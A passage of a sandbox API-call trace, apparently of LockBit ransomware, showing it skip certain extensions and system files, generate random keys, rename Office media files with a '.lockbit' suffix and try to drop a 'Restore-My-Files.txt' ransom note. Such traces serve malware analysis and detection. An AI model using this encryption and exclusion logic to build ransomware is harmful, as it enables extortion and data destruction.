lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.422] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.423] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.423] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0252349.WMF") returned 1 [0197.423] lstrcmpiW (lpString1="ntldr", lpString2="J0252349.WMF") returned 1 [0197.423] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0252349.WMF") returned 1 [0197.423] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0252349.WMF") returned -1 [0197.423] lstrcmpiW (lpString1="autorun.inf", lpString2="J0252349.WMF") returned -1 [0197.423] lstrcmpiW (lpString1="thumbs.db", lpString2="J0252349.WMF") returned 1 [0197.423] lstrcmpiW (lpString1="iconcache.db", lpString2="J0252349.WMF") returned -1 [0197.423] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.423] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0252349.WMF") returned=".WMF" [0197.423] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.424] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.424] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.425] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.425] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0252349.WMF.lockbit") returned 70 [0197.425] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0252349.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0252349.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.426] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.426] malloc (_Size=0x40068) returned 0x3df0008 [0197.426] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5516) returned 1 [0197.426] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.427] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.427] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.427] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.427] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.432] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0252349.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0252349.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.432] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.432] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.433] free (_Block=0x1fa2ed8) [0197.433] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0252349.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.433] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.433] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.433] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fdf2000, ftCreationTime.dwHighDateTime=0x1beccca, ftLastAccessTime.dwLowDateTime=0xbd5ab520, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3fdf2000, ftLastWriteTime.dwHighDateTime=0x1beccca, nFileSizeHigh=0x0, nFileSizeLow=0xed0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0278882.WMF", cAlternateFileName="")) returned 1 [0197.433] lstrcmpiW (lpString1=".", lpString2="J0278882.WMF") returned -1 [0197.433] lstrcmpiW (lpString1="..", lpString2="J0278882.WMF") returned -1 [0197.433] PathFindExtensionW (pszPath="J0278882.WMF") returned=".WMF" [0197.433] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.433] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.433] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.433] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.433] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.433] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.433] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.433] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.433] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.433] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.433] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.433] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.433] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.433] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.433] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.433] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.434] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.434] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0278882.WMF") returned 1 [0197.434] lstrcmpiW (lpString1="ntldr", lpString2="J0278882.WMF") returned 1 [0197.435] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0278882.WMF") returned 1 [0197.435] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0278882.WMF") returned -1 [0197.435] lstrcmpiW (lpString1="autorun.inf", lpString2="J0278882.WMF") returned -1 [0197.435] lstrcmpiW (lpString1="thumbs.db", lpString2="J0278882.WMF") returned 1 [0197.435] lstrcmpiW (lpString1="iconcache.db", lpString2="J0278882.WMF") returned -1 [0197.435] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.435] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0278882.WMF") returned=".WMF" [0197.435] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.435] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.435] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.436] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.436] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.436] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.436] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0278882.WMF.lockbit") returned 70 [0197.436] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0278882.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0278882.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.437] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.437] malloc (_Size=0x40068) returned 0x3df0008 [0197.437] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3792) returned 1 [0197.437] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.437] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.437] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.438] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.438] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.438] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.438] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.457] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0278882.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0278882.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.457] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.457] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.457] free (_Block=0x1fa2ed8) [0197.457] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0278882.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.457] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.457] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.457] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecd0c800, ftCreationTime.dwHighDateTime=0x1bee443, ftLastAccessTime.dwLowDateTime=0xbd5ab520, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xecd0c800, ftLastWriteTime.dwHighDateTime=0x1bee443, nFileSizeHigh=0x0, nFileSizeLow=0x4ffa, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0281904.WMF", cAlternateFileName="")) returned 1 [0197.457] lstrcmpiW (lpString1=".", lpString2="J0281904.WMF") returned -1 [0197.457] lstrcmpiW (lpString1="..", lpString2="J0281904.WMF") returned -1 [0197.457] PathFindExtensionW (pszPath="J0281904.WMF") returned=".WMF" [0197.458] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.458] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.459] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.459] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0281904.WMF") returned 1 [0197.459] lstrcmpiW (lpString1="ntldr", lpString2="J0281904.WMF") returned 1 [0197.459] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0281904.WMF") returned 1 [0197.459] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0281904.WMF") returned -1 [0197.459] lstrcmpiW (lpString1="autorun.inf", lpString2="J0281904.WMF") returned -1 [0197.459] lstrcmpiW (lpString1="thumbs.db", lpString2="J0281904.WMF") returned 1 [0197.459] lstrcmpiW (lpString1="iconcache.db", lpString2="J0281904.WMF") returned -1 [0197.459] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.460] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0281904.WMF") returned=".WMF" [0197.460] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.460] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.460] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.461] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0281904.WMF.lockbit") returned 70 [0197.461] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0281904.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0281904.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.462] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.462] malloc (_Size=0x40068) returned 0x3df0008 [0197.462] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=20474) returned 1 [0197.462] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.463] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.463] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.464] GetProcAddress (hModule=0x753f0000, 